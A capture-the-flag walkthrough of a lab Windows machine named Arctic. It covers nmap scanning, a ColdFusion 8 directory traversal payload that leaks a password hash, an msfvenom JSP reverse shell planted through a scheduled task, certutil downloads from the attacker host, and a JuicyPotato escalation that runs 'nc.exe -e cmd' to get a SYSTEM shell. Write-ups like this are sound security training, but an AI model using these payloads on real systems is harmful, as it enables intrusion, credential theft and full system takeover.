Arctic

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.11 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Wed Jan 12 15:27:38 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.16s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

# Nmap done at Wed Jan 12 15:30:02 2022 -- 1 IP address (1 host up) scanned in 144.22 seconds

As we see, ports 135, 8500 and 49154 are open. Let's try to obtain more information about the service and version running on those ports. The following command will scan the previous ports more in depth and save the result into a file:

nmap -sC -sV -p135,8500,49154 10.10.10.11 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed Jan 12 15:31:30 2022 as: nmap -sCV -p135,8500,49154 -oN targeted 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.065s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 15:33:47 2022 -- 1 IP address (1 host up) scanned in 137.04 seconds

Nmap it's not really sure what service is running in port 8500. If we see if there is any website with the browser, we will see there is a web server with directory listing.

If we take a look at the CFIDE/ directory, we will find the Administrator/ directory which will show us a login page.

Exploitation

Now we know we are facing an Adobe Coldfusion 8 login page. Let's search for any common exploits on exploit-db.

Exploit-DB is a great database of exploits and proof-of-concepts used by penetration testers and vulnerability researchers.

https://www.exploit-db.com/

I found a Directory Traversal exploit which points at the following URL.

/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Let's check it out.

And we get a password hash. Let's make use of rainbow tables and try to find out the password.

CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash.

https://crackstation.net/

And we get a password! Let's log in into the administrator login page.

At this point, to get a shell, we will have to make a Scheduled Task which downloads a reverse shell from our machine and stores it into the CFIDE/ directory.

First thing we have to do, is look for the path in which the CFIDE/ is stored on the victim machine. If we look closely to the left panel, which has a lot of administrative tools, we will find the Mappings section.

Now we know where the /CFIDE directory is located in the victim machine. Before creating the Scheduled Task, let's create the reverse shell file.

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.9 lport=4444 -o shell.jsp

• -p indicates the type of payload.

• lhost local host IP.

• lport local port of the listener.

• -o save the output to a file.

And we set an HTTP server with python on port 8000.

python -m SimpleHTTPServer

Now it's time to make the Scheduled Task. We will have to click on Scheduled Tasks > Schedule New Task. Next, we will put a name to the task, set the URL to the shell.jsp binary located in our machine, and indicate the absolute path of the output file which will be C:\ColdFusion8\wwroot\CFIDE\shell.jsp, and hit Submit.

To activate the Scheduled Task, let's click on the green button, and we should see a GET petition on the python HTTP server.

Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.11 - - [24/Jan/2022 16:55:51] "GET /shell.jsp HTTP/1.1" 200 -

If now we check the /CFIDE directory, we will see the shell.jsp file.

Before activating it, let's set a netcat listener on port 4444.

nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

If we now click on the shell link, we should get the reverse shell as the user tolis, and we could be able to grab the user flag.

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.11] 49506
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

C:\ColdFusion8\runtime\bin>type \users\tolis\desktop\user.txt
type \users\tolis\desktop\user.txt
02650d3a69a70780c302e146a6cb96f3

Privilege Escalation

Let's start by seeing what privileges the user tolis has.

whoami /priv

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

If a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.

JuicyPotato is a local privilege escalation tool for Windows, which uses COM objects for privilege escalation. It is needed that SeImpersonate or SeAssignPrimaryToken are enabled.

https://github.com/ohpe/juicy-potato

To escalate privileges, we'll have to transfer JuicyPotato.exe and nc.exe binaries to the victim machine. Let's set a python HTTP server on the directory where we have those binaries.

python -m SimpleHTTPServer

And download the binaries from the desktop folder of the tolis user.

certutil.exe -f -urlcache -split http://10.10.14.9:8000/JuicyPotato.exe JuicyPotato.exe

certutil.exe -f -urlcache -split http://10.10.14.9:8000/nc.exe nc.exe

Before executing the JuicyPotato.exe binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM user.

nc -lvnp 5555

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Finally, let's run the Juicy Potato binary and get a shell as the NT AUTHORITY\SYSTEM user. Then all we have to do is reap the harvest and take the root flag.

JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\users\tolis\desktop\nc.exe -e cmd 10.10.14.9 5555"

• -t createprocess call.

• -l COM server listen port.

• -p program to launch.

• -a specify command arguments.

listening on [any] 5555 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.11] 49645
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
ce65ceee66b2b5ebaff07e50508ffb90